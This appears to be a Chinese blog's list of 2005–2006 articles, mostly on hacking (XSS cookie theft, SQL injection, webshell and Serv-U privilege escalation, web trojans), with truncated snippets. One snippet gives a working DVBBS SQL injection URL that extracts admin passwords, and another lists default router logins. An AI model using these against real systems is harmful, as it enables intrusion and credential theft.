- 博客(256)
- 收藏
- 关注
RSS订阅转载 利用Microsoft.XMLHTTP控件发送COOKIE
来自:[url=http://s0n9.blog.sohu.com]s0n95 B1o9 [/url] 跨站脚本攻击想必各位都已经是很熟悉了,但是得到COOKIE的时候一直有一个问题:总是要用WINDOW.OPEN弹一个窗体出来然后发送COOKIE,这样隐秘性就大打折扣了。以前我想了一个在网页中用insertAdjacentHTML方法来注入HTML语句的办法勉强可以作到发送COOKIE不出现I
2006-08-31 18:46:00
1382
转载 系统修复-菜鸟也DIY
当斑竹不在的时候我们菜鸟该怎么办呢?还是自己弄一下把!~下面是我在网上收集的危险dll文件!大家在扫完后可以自己对照一下!~该删的就删!~~也许你自己就能吧系统弄好!~呵呵!~也希望大家多多支持!~多多交流!~ctrl+f>来查询!~DLL 文件: advert 或者 advert.dllDLL 名称: Advert.dll描述:advert.dll是一个广告软件相关文件,会在Internet E
2006-08-12 18:23:00
1491
原创 系统修复-菜鸟也DIY
当斑竹不在的时候我们菜鸟该怎么办呢?还是自己弄一下把!~下面是我在网上收集的危险dll文件!大家在扫完后可以自己对照一下!~该删的就删!~~也许你自己就能吧系统弄好!~呵呵!~也希望大家多多支持!~多多交流!~ctrl+f>来查询!~DLL 文件: advert 或者 advert.dllDLL 名称: Advert.dll描述:advert.dll是一个广告软件相关文件,会在Internet E
2006-08-12 18:23:00
1680
原创 解析#pragma指令
在所有的预处理指令中,#Pragma 指令可能是最复杂的了,它的作用是设定编译器的状态或者是指示编译器完成一些特定的动作。#pragma指令对每个编译器给出了一个方法,在保持与C和C++语言完全兼容的情况下,给出主机或操作系统专有的特征。依据定义,编译指示是机器或操作系统专有的,且对于每个编译器都是不同的。其格式一般为: #Pragma Para其中Para 为参数,下面来看一些常用的参数。 (1
2005-10-02 17:30:00
3468
2
原创 缓冲区溢出原理及防护(05年第六期)
中科院研究生院 蒋 涛 摘 要 本文详细分析了缓冲区溢出的原理,描述了网络攻击者利用缓冲区溢出漏洞进行系统攻击的一般过程,最后简单讨论了几种缓冲区溢出的保护方法。关键词 缓冲区溢出 缓冲区溢出漏洞 安全攻击 缓冲区溢出保护在过去的十年中,以缓冲区溢出为攻击类型的安全漏洞是最为常见的一种形式。更为严重的是,缓冲区溢出漏洞占了远程网络攻击的绝大多数,这种攻击可以使得一个匿名的Internet用户有机
2005-09-04 22:40:00
2453
1
原创 Sql-Server应用程序的高级Sql注入
本文作者:未知文章出处:未知文章性质:原创阅读次数:22发布日期:2004-09-27 Sql-Server应用程序的高级Sql注入 本文作者:Chris Anley 翻译: luoluo [luoluonet@hotmail.com] 小组: http://www.ph4nt0m.net/ http://www.play8.net/ [目 录] [概要] [介绍] [通过错误信息获取信息] [更
2005-08-31 02:13:00
2603
原创 CFM SQL injection
呵呵,基本和asp类似了,不过要看是什么平台支撑着,文档有二篇,是以问问题的形式给出,发现国外对计算机上不管是教学还是文章,都会比国内的教学幽默得多,学习起来轻松许多,哎,什么时候国内才可以变化这样的情况,估计永远也等不到了,哎! Quote It looks like the query that youre attacking isnt prepending and appending q
2005-08-24 19:58:00
2238
原创 WEBSHELL权限提升技巧(综合版)
c: d: e:.....C:/Documents and Settings/All Users/「开始」菜单/程序/看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,
2005-08-24 17:29:00
3299
原创 用批处理调用API实现文件下载
※原创作者:ZV(ZVROP) ※信息来源:LinkBOYs BLOG批处理能被玩到这样的境界我实在没话说了,ZV兄果然是厉害呀。。。我前些天在自己电脑上还找到个ZV19岁时候写的一个木马程序,黑镜,虽然在现在看来并不是很好,但是在当时能写出来真的是很不错了哦,不知道偶菲儿姐看到了会怎么样。。。HOHO,不多说了,不然让菲儿姐看到,非把我老窝给端了不可。哈哈。。。一.写在前面的话 这篇文档讲述的
2005-08-19 19:19:00
2403
原创 DELPHI基础开发技巧
DELPHI基础开发技巧◇[DELPHI]网络邻居复制文件uses shellapi;copyfile(pchar(newfile.txt),pchar(//computername/direction/targer.txt),false);◇[DELPHI]产生鼠标拖动效果通过MouseMove事件、DragOver事件、EndDrag事件实现,例如在PANEL上的LABEL:v
2005-08-18 03:07:00
2028
2
原创 DVBBS 7.0 SP2 注入
DVBBS 7.0 SP2 注入 9xiao & 放手 问题recycle.asp的注入漏洞,利用union查询把dv_log中记录的后台管理账号和密码一次性查询。dv_bbs1是回收站的表 recycle.asp?tablename=dv_bbs1 union select 1,1,userpassword,1,1,1 from dv_admin where id=9 union select
2005-08-17 22:03:00
2864
原创 关于http协议的一些东西
Network Working Group R. FieldingRequest for Comments: 2616 UC IrvineObsoletes: 2068
2005-08-17 09:19:00
3459
原创 黑客防线——主机外部的危险- -
协议漏洞,永远不会被放弃的手段。 前言:不是我有意想搞你,而是你们有些过分了,拿着别人的稿子去卖钱,拿着别人的技术装点自己,这也无所谓。你们那种优越感让我不得不提醒你们一下,你们的优越是建立在别人付出之上的。一、扫描,发现开着ftp。。。。。没常见漏洞。。。。。决定arp欺骗,进行嗅探。二、找嗅探主机: C:/>ping hacker.com.cn Pinging hacker.com
2005-08-11 00:21:00
1778
原创 妙用代理渗透内网- -
文章作者:LiNzi [BCT&混客联盟](chinaskyv@163.com)信息来源:邪恶八进制信息安全团队正文代理在入侵里的作用-----妙用代理,渗透内网一、踩点主机: http://www.baidu.com/OS:Windows 2000 + IIS 5.0 + MSSQL端口:80 21数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.首页存在注入漏洞,s
2005-08-11 00:13:00
1852
原创 从上传webshell到突破TCP-IP筛选到3389终端登陆
一:得到webshell今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~突然发现一个聊天室特别的火暴,人数已经有500人在里面了(满员了),刷了n次也没有进去..........更加郁闷了!:(想想反正也是没有事情做,测试一
2005-08-11 00:04:00
1609
原创 Serv-U FTP Server本地提升权限缺陷
Serv-U FTP Server为RhinoSoft出品的一款Ftp Server软件,可运行在Microsoft Windows平台下。ServUAdmin.exe是ftp server管理界面,由于ServUAdmin.exe对异常的不正确处理,导致在Serv-U被注册为系统服务的情况下,本地普通用户进行权限提升,得到超级用户的权限。远程用普通用户权限,可以通过3389登陆的也可以进行提升。
2005-08-07 17:30:00
1468
原创 windows黑客编程
要想在安全知识方面有更多的建树,那么编程就是你必须得懂的技能。前几天在网上看了《WIN下编程须知》一文,觉得写出一篇适合初学者们看的入门级文章的确很重要,可惜此文只介绍了线程、消息、句柄等几个基本概念。很多初学者看了对编程还是感到很迷惑,一个从来没有写过程序的人如何入门?如何在短时间内写出自己的程序来?笔者带着这些问题写了这篇文章。这也是笔者在学习编程的初期所遇到的困惑,在此根据笔者的个人理解将其
2005-07-24 17:29:00
1651
原创 Delphi 7.0常用函数速查手册
Borland资深程序员 何群 电脑报2004年附录 函数由一句或多句代码组成,可以实现某个特定的功能。使用函数可以使代码更加易读、易懂,加快编程速度及减少重复代码。过程与函数类似,过程与函数最重要的区别在于,过程没有返回值,而函数能有返回值。 在Delphi 7.0中,已为我们定义好了非常多的函数,大致分类有6种:数据类型转换函数、字符串、数组*作函数、文件、磁盘*作函数、内存、指针*作
2005-07-23 22:02:00
1471
原创 在Delphi 7 中用Indy开发Socket应用程序
笔者在前一段的工作中,需要开发一套简单的网络数据传输程序。由于平时常用Delphi做点开发,故此次也不例外。Delphi 7中带有两套TCP Socket组件:Indy Socket组件(IdTCPClient和IdTCPServer)和Delphi原生的TCP Socket组件(ClientSocket和ServerSocket)。但是,Borland已宣称ClientSocket和Server
2005-07-23 00:11:00
2697
原创 SQL 中日期的处理
通常,你需要获得当前日期和计算一些其他的日期,例如,你的程序可能需要判断一个月的第一天或者最后一天。你们大部分人大概都知道怎样把日期进行分割(年、月、日等),然后仅仅用分割出来的年、月、日等放在几个函数中计算出自己所需要的日期!在这篇文章里,我将告诉你如何使用DATEADD和DATEDIFF函数来计算出在你的程序中可能你要用到的一些不同日期。 在使用本文中的例子之前,你必须注意以下的问题。大部分可
2005-07-20 22:30:00
1731
原创 打造完美的IE网页木马
既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个完美的IE网页木马至少应具备下列四项特征: 一:可以躲过杀毒软件的追杀; 二:可以避开网络防火墙的报警; 三:能够适用于多数的WINDOWS操作系统(主要包括WIN98、WINME、WIN2000、WINXP、WIN2003)中的多数IE版本(主要包括IE5.0、IE5.5、IE6.0),最好能打倒SP补丁
2005-07-16 22:06:00
884
原创 提权,以MySQL之名
作者kEvin注:稿件已刊登于《黑客防线》2005年第7期上,转载请著明版权与出处。前不久网上公开了一个MySQL Func的漏洞,讲的是使用MySQL创建一个自定义的函数,然后通过这个函数来攻击服务器。最早看到相关的报道是在o-otik上,但是公布的是针对Unix系统的Exploit,并且成功率也不是很高.而近期,国内有高手放出针对Win系统的相关文章,于是我马上找来与朋友一同研究.其实我们早就
2005-07-14 12:16:00
725
原创 Serv-U权限提升再提升
文章作者:intruder信息来源:邪恶八进制 中国应《黑客X档案》要求 冰血将其移动到内部不允许公开 因为这文章已经发到书上了! 自从Serv-U本地权限提升漏洞出来以后,大家手握Su.exe这把网兜逢鸡就罩,一时间的肉鸡明显增多、质量直线上升啊。特别《Win2000虚拟主机入侵大法》中的方法流传广泛之后,大家手里开始有了些做虚拟主机的高带宽、大内存,甚至有N个CPU的极品肉鸡,恭喜恭喜啊^_
2005-07-09 14:40:00
793
原创 open3389源程序
来自:laoxie‘s Blogvoid main(int argc, char* argv[]) { HKEY hKey; HANDLE hProcess, hToken; TOKEN_PRIVILEGES NewState; DWORD ProcessId, ReturnLength = 0; LUID luidPrivilegeLUID; LPCTSTR key[]={"SOFTWARE//
2005-07-07 22:12:00
673
原创 终结动网最新挂马方法
作者:怪狗 华夏黑客同盟注意:本文章仅作为技术研究之用,请勿用于非法用途,所造成得后果与本人无关!一,发现言归正传在华夏黑客论坛 版主交流区发现 jijy 报告论坛被挂马,(在此感谢jijy为论坛做出的贡献)http://bbs.77169.com/dispbbs_165_59990_1.html这是最新的网页木马。心中一惊.没打补丁将会弹出帮助!当然的手提电脑是打了补丁的,当我打开此篇贴子之后,
2005-07-04 23:40:00
809
原创 一个简单的php在线端口扫描器
本文作者:angel文章性质:原创发布日期:2004-04-02前言 PHP是一种功能强大的Web开发语言。开发效率高,语法简单,为动态网站量身定做,加强面向对象(向C++靠拢,与JAVA搭了点边),可惜单线程(这是至命弱点,据说PHP是用C/C++编写的。),也能用C、C++、JAVA开发中间层,调用COM,服务器维护难度小,故障少。 既然是为动态网站量身定做,所以注定不能开发出X-sc
2005-07-02 13:34:00
916
原创 动网论坛7.0获得WebShell的分析
本文作者:angel文章性质:原创发布日期:2004-06-27发现:Super·Hei 分析:angel 环境/讨论:xiaolu 起哄:knife 前言 Super·Hei和我提起《Backup a shell》这篇文章,就和我说,按照这个文章的方法,有没有办法拿到动网论坛上利用,因为DVBBS7.0即使设置允许上传asp文件,实际上也是无法上传的,既然能够去后台设置允许上传文件类型,那何
2005-07-02 13:31:00
680
原创 XP中服务与后门技术
来自:hackabse.com一、序言 Windows下的服务程序都遵循服务控制管理器(SCM)的接口标准,它们会在登录系统时自动运行,甚至在没有用户登录系统的情况下也会正常执行,类似与UNIX系统中的守护进程(daemon)。它们大多是控制台程序,不过也有少数的GUI程序。本文所涉及到的服务程序仅限于Windows2000/XP系统中的一般服务程序,不包含Windows9X。 二、Win
2005-07-01 18:36:00
774
原创 PHP读取某站点的链接的函数
原理:读取某站点的源文件,再利用正则分析其源代码,得到所有链接/**********qiushuiwuhen(2002-5-20)***********/if(empty($url))$url = "http://www.csdn.net/expert/";//设置url$site=substr($url,0,strpos($url,"/",8));//站点$base=substr($url,0,
2005-07-01 18:32:00
855
原创 PHP安全漏洞(老早了)
php4.3.9存在字符攻击漏洞,利用此漏洞,攻击者可读取任意文件。存在于php4.3.6 ~ 4.3.9以及php5.0.0 ~ 5.0.2中的bug,攻击者可以通过构造上传文件的名称来跨越目录权限。这几个漏洞同时存在于win32及unix版本中,win32易受攻击!Addslashes() 漏洞在Addslashes()函数中,空字节被错误编码,当某个文件通过include或者require来
2005-06-30 19:09:00
1093
原创 用PHP控制您的浏览器cache
Output Control 函数可以让你自由控制脚本中数据的输出。它非常地有用,特别是对于:当你想在数据已经输出后,再输出文件头的情况。输出控制函数不对使用 header() 或 setcookie(), 发送的文件头信息产生影响,只对那些类似于 echo() 和 PHP 代码的数据块有作用。 我们先举一个简单的例子,让大家对Output Control有一个大致的印象: Example 1.
2005-06-30 17:08:00
830
原创 病毒判断技术浅谈
作者:风泽[EvilHsu]出处:[EST]ps:终于知道了杀毒软件是怎么杀毒的了!呵呵!相信大多数人都用过杀毒软件吧,也知道病毒软件需要经常的更新病毒库吧,呵呵,其实这个病毒库里面收集的就是从病毒中提取的特征码。然后通过特征码的比较来判断文件是否为病毒。知道了这些我们就可以自己动手来做一个简单的病毒判断程序了。首先我们要自己提取病毒特征码,为了安全起见,我就用CA来做例子吧,什么?不知道CA?那
2005-06-30 15:59:00
678
原创 认识win强大的管理工具——WMI(脚本篇)
文章作者:勇敢的风 [E.S.T顾问团] feng.cnblog.com.cn信息来源:邪恶八进制安全小组 www.eviloctal.com好长时间没有写东西了,由于本人的文笔不怎么好,所以大家不要笑我。以下内容均为自己理解的,如有错误之处还请大家指出。我的技术面很窄,所以以下内容中的代码均为ASP+VBScript。正文:------------------------------------
2005-06-27 22:22:00
1376
1
原创 adsl 路由器默认密码
艾玛 701g 192.168.101.1 192.168.0.1 用户名:admin 密码:admin 用户名:SZIM 密码:SZIM 艾玛701H 192.168.1.1 10.0.0.2 用户名:admin 密码:epicrouter 实达2110EH ROUTER 192.168.10.1 用户名:user 密码:password 用户名:root 密码:gr
2005-06-14 17:43:00
4888
1
原创 ASP.NET虚拟主机安全隐患
本文作者:未知文章出处:未知文章性质:原创阅读次数:1发布日期:2004-08-24 转载自:www.HackBase.com 说明:本文中所有程序均在Windows 2000 Server中文版 + SP2上编译运行无误 开发环境:.Net 框架1.0 Version 1.0.3705 一、ASP.NET虚拟主机存在的重大隐患 我曾经在WWW.BRINKSTER.COM申请了一个免费的A
2005-06-13 19:36:00
2096
4
原创 站内上传脚本图片欺骗式攻击
本文作者:未知文章出处:未知文章性质:原创阅读次数:2发布日期:2004-08-24 测试过程: 其实很早前我就做过这个的教程 可能很少人看过 因为没发过 就是 另外的一个动网跨站攻击 把图片改成HTML代码 上传后可执行 做转向 (其实很 多人都知道了) 发现的过程是在我今天无聊 看了一下某大黑客网站哦 BBS上 做了过滤 上传失败 然后回到主页上 是动力系统 于是注册了一个帐号 然后到 个人管
2005-06-13 19:35:00
930
原创 微软公司最经典的面试题(含答案)
微软公司最经典的面试题(含答案)12个小球,其中11个一模一样,而有1个外表一样,但质量不一样(不知道是比其它的球重还是轻)。现在有一个没有刻度的天平,请最多用这个天平称三次,把这个不同的球找出来。 答案1:12个球,两边各放六个,必然有一边重一边轻(第一次称)。把较重的一边平均分到两个称盘进行称量,会有两种结果:质量相同,说明要找的球在另六个中,且较轻;如果质量不同,说明哪个球在现在所称量的
2005-06-12 19:04:00
1734
3
原创 《Windows程序设计》读书笔记之
最近有幸拜读了Charles Petzold的大作《Windows程序设计》,真有种相见恨晚的感觉。这是一本1999年出版、主要讲述在Windows平台下如何使用C语言调用API函数进行软件开发的老书。在当今RAD工具充斥市场的今天,该书依然是新手从事Windows下软件开发入门的不二之选。本人从事Windows平台软件开发已近三年,Windows相关的书籍和文档也阅读过不少,直到接触该书之后,好
2005-06-12 19:03:00
924
原创 PHP通用防注入安全代码
来源:中国防黑网 作者:三尺寒冰 简述:/*************************说明:判断传递的变量中是否含有非法字符如$_POST、$_GET功能:防注入**************************/ //要过滤的非法字符$ArrFiltrate=array("",";","union");//出错后要跳转的url,不填则默认前一页$StrGoUrl="";//是否存在数组
2005-06-12 11:15:00
1052
原创 WindowsServer 2003/"安全事件ID/"分析
来自:网络根据下面的ID,可以帮助我们快速识别由Windows Server 2003操作系统生成的安全事件,究竟意味着什么事件出现了。 一、帐户登录事件 下面显示了由“审核帐户登录事件”安全模板设置所生成的安全事件。 672:已成功颁发和验证身份验证服务 (AS) 票证。 673:授权票证服务 (TGS) 票证已授权。TGS 是由 Kerberos v5 票证授权服务 (TGS)
2005-06-12 11:14:00
848
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人